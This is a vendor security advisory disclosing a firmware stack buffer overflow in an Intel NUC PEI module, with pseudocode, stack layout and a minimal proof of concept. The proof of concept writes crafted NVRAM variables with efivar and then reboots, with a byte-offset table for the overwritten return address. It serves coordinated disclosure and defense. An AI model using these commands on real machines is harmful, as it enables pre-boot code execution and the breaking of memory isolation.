[BRLY-2022-027] The stack buffer overflow vulnerability leads to arbitrary code execution during PEI phase on Intel platform.

August 10, 2022

Summary

BINARLY efiXplorer team has discovered a stack buffer overflow vulnerability on Intel platforms allowing a possible attacker to execute arbitrary code during PEI phase.

Vulnerability Information

  • BINARLY internal vulnerability identifier: BRLY-2022-027
  • Intel PSIRT assigned CVE identifier: CVE-2022-28858
  • AMI PSIRT assigned CVE identifier: CVE-2022-26873
  • CERT/CC assigned case number: VU#158026
  • FwHunt rule: BRLY-2022-027
  • CVSS v3.1: 8.2 High AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Affected Intel firmwares with confirmed impact by Binarly team

Device/Firmware File Name SHA256 (File PE32 section) File GUID
Intel NUC M15 PlatformInitAdvancedPreMem 644044fdb8daea30a7820e0f5f88dbf5cd460af72fbf70418e9d2e47efed8d9b EEEE611D-F78F-4FB9-B868-55907F169280

Potential impact

A potential attacker can execute an arbitrary code at the time of the PEI phase and influence the subsequent boot stages. This can lead to the mitigasions bypassing, physical memory contents disclosure, discovery of any secrets from any Virtual Machines (VMs) and bypassing memory isolation and confidential computing boundaries. Additionally, an attacker can build a payload which can be injected into the SMRAM memory.

Vulnerability description

The pseudocode for vulnerable function is shown below:

int __thiscall sub_FFAE2B82(void *this)
{
  ...
  const EFI_PEI_SERVICES **PeiServices;
  char CpuSetupData[1072];
  UINTN DataSize;
  EFI_PEI_READ_ONLY_VARIABLE2_PPI *Ppi;

  ...
  DataSize = 1072;
  Ppi->GetVariable(Ppi, L"SaSetup", &gSaSetupGuid, 0, &DataSize, CpuSetupData);
  Ppi->GetVariable(Ppi, L"CpuSetup", &gCpuSetupGuid, 0, &DataSize, CpuSetupData);
  ...
  return 0;
}

If the value of the SaSetup NVRAM variable is larger than 1072 bytes, then after the first call of the Ppi->GetVariable() service, the DataSize value will be overwritten with the real size of the SaSetup NVRAM variable.

After second call of the Ppi->GetVariable() service stack overflow may occur.An overflow of 24 bytes is enough to execute arbitrary code:

-00000440 CpuSetupData    db 1072 dup(?)
-00000010 var_10          db ?
-0000000F                 db ? ; undefined
-0000000E var_E           dd ?
-0000000A                 db ? ; undefined
-00000009                 db ? ; undefined
-00000008 DataSize        dd ?
-00000004 Ppi             dd ?                    ; offset
+00000000  s              db 4 dup(?)
+00000004  r              db 4 dup(?)

Minimal POC

sudo efivar -w -f SaSetupData_new.bin --name 72c5e28c-7783-43a1-8767-fad73fccafa4-SaSetup
sudo efivar -w -f CpuSetupData_new.bin --name b08f97ff-e6e8-4193-a997-5e9e9b0adb32-CpuSetup
sudo reboot

The data in the file SaSetupData_new.bin may be as follows:

Offset Data
0x0 Old data of SaSetup NVRAM variable
0x430 Some data
0x444 Last dword

The data in the file CpuSetupData_new.bin may be as follows:

Offset Data
0x0 Old data of CpuSetup NVRAM variable
0x244 Some data
0x444 New return address

Disclosure timeline

This bug is subject to a 90 day disclosure deadline. After 90 days elapsed or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public.

Disclosure Activity Date
Intel PSIRT is notified 2022-02-11
Intel PSIRT confirmed reported issue 2022-03-22
Intel PSIRT assigned CVE number 2022-03-22
Intel PSIRT provide patch release 2022-03-22
BINARLY public disclosure date 2022-08-10

Acknowledgements

BINARLY efiXplorer team

Tags
PEI